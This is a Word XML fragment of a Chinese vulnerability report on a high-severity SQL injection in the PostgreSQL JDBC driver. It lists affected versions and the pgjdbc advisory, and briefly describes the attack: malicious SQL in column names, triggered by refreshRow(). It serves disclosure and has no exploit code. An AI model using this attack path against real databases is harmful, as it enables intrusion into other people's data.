            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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CNNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>提交时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>2023/7/19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="164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漏洞发现者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>空</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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CNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="164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提交者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>李佳豪/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>王伯雅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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搜索关键词</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>影响范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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shd w:val="clear" w:fill="FFFFFF"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="1F2328"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>org.postgresql:postgresql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt; 42.2.26 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:shd w:val="clear" w:fill="FFFFFF"/>
              <w:ind w:firstLine="2640" w:firstLineChars="1100"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>&gt;= 42.3.0, &lt; 42.3.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:shd w:val="clear" w:fill="FFFFFF"/>
              <w:ind w:firstLine="2640" w:firstLineChars="1100"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>&gt;= 42.4.0, &lt; 42.4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>来源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="412" w:hRule="atLeast"/>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞简介</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>PostgreSQL JDBC SQL注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>该攻击要求攻击者诱骗用户针对列名包含恶意 SQL 的表名执行 SQL，然后调用 ResultSet 上的“refreshRow()”方法。应用程序的 JDBC 用户和数据库所有者不必相同。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>以特权用户身份执行并查询潜在恶意的低特权用户所拥有的数据库将很容易受到攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>参考链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="14"/>
              <w:tblW w:w="9229" w:type="dxa"/>
              <w:jc w:val="center"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="0" w:type="dxa"/>
                <w:left w:w="108" w:type="dxa"/>
                <w:bottom w:w="0" w:type="dxa"/>
                <w:right w:w="108" w:type="dxa"/>
              </w:tblCellMar>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="7812"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr>
                <w:jc w:val="center"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7812" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                    <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                    <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                    <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                  </w:tcBorders>
                  <w:vAlign w:val="top"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="18"/>
                    <w:spacing w:line="480" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/pgjdbc/p" </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>https://github.com/pgjdbc/p</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                      <w:color w:val="000000"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
